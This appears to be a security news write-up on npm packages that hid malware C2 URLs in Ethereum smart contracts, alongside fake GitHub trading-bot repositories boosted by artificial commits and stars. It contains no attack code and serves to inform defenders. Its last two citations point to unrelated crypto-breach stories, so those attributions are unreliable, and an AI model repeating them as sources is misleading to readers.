A novel and intricate cyberattack method has been discovered, where malicious actors are using Ethereum blockchain’s smart contracts to conceal and distribute harmful software. This technique surfaced in two npm packages, named colortoolsv2 and mimelib2, both of which were uploaded to the npm registry around July 2025. Upon the discovery, these packages were immediately taken down. The malicious code within these packages exploits smart contracts to store hidden web addresses (URLs) that fetch further malware components from a remote command and control (C2) server. This strategy complicates detection as the harmful infrastructure isn’t directly included in the package itself, but instead resides on the blockchain [1].
This security breach extends beyond just the npm ecosystem and involves a well-orchestrated campaign targeting GitHub repositories. Several of these repositories, such as solana-trading-bot-v2, ethereum-mev-bot-v2, and arbitrage-bot, appear to be legitimate cryptocurrency trading bots. However, experts at ReversingLabs have determined that this apparent legitimacy is largely fabricated. These repositories were filled with thousands of commits, many of which were artificially generated, and were promoted by fake GitHub accounts that added stars and forked the repositories. These accounts were created around July 2025 and showed very little activity outside this specific campaign. Automated systems generating commits were also identified, primarily involving minor LICENSE file modifications, a clear attempt to artificially inflate the repository’s perceived trustworthiness [2].
The malicious packages were incorporated into these repositories as dependencies. The colortoolsv2 package was intentionally replaced with mimelib2 to avoid detection and keep the malicious campaign active. Researchers also uncovered multiple user accounts connected to the campaign, including one named pasttimerles, responsible for a significant portion of the fake commits. Another account, slunfuedrac, was found to be the one incorporating the malicious packages into the code of these repositories [3].
Utilizing Ethereum smart contracts for malware delivery represents a relatively new development in the cybersecurity landscape. Unlike conventional malware distribution methods that embed malicious URLs directly within the package’s code, these packages use smart contracts to store those URLs and relevant commands. A similar tactic was observed back in 2023 with malicious Python packages that used GitHub Gists to host C2 URLs. The shift to using smart contracts signifies a notable evolution in techniques used to evade detection [4].
This campaign forms part of a larger trend of supply chain attacks specifically targeting cryptocurrency developers. According to the ReversingLabs 2025 Software Supply Chain Security report, there were 23 similar attacks in 2024, including the compromise of the PyPI package ultralytics, which delivered a cryptocurrency mining program. The use of open-source repositories as a channel to distribute malware highlights the critical need for developers to carefully assess the trustworthiness and integrity of any third-party packages they use. This evaluation should extend beyond the package itself, also scrutinizing its maintainers and the broader ecosystem in which it exists [5].
Based on these findings, ReversingLabs recommends that developers implement a more thorough vetting process for open-source packages. This should involve carefully analyzing the history of the package, verifying the credibility of its maintainers, and examining the overall activity within the associated repositories. The company has also developed tools such as Spectra Assure Community to aid in assessing the security posture of open-source packages. Due to the increasing sophistication of supply chain attacks, developers and organizations must remain alert and adapt their security approaches to effectively address these evolving threats [6].
Source: [1] Ethereum Contracts Used to Hide Malicious Code (https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code) [2] Malicious npm Packages Exploit Ethereum Smart Contracts (https://thehackernews.com/2025/09/malicious-npm-packages-exploit-ethereum.html) [3] Malicious npm Packages Exploit Ethereum Smart Contracts (https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit/) [4] Malicious npm Packages Use Ethereum Blockchain for Malware Delivery (https://www.csoonline.com/article/4050956/malicious-npm-packages-use-ethereum-blockchain-for-malware-delivery.html) [5] Trump’s Crypto Project Under Attack (https://finance.yahoo.com/news/trump-crypto-project-wlfi-under-081337737.html) [6] BunniXYZ Ethereum Exchange Suffers $2.3M Breach (https://www.mitrade.com/insights/news/live-news/article-3-1087725-20250902)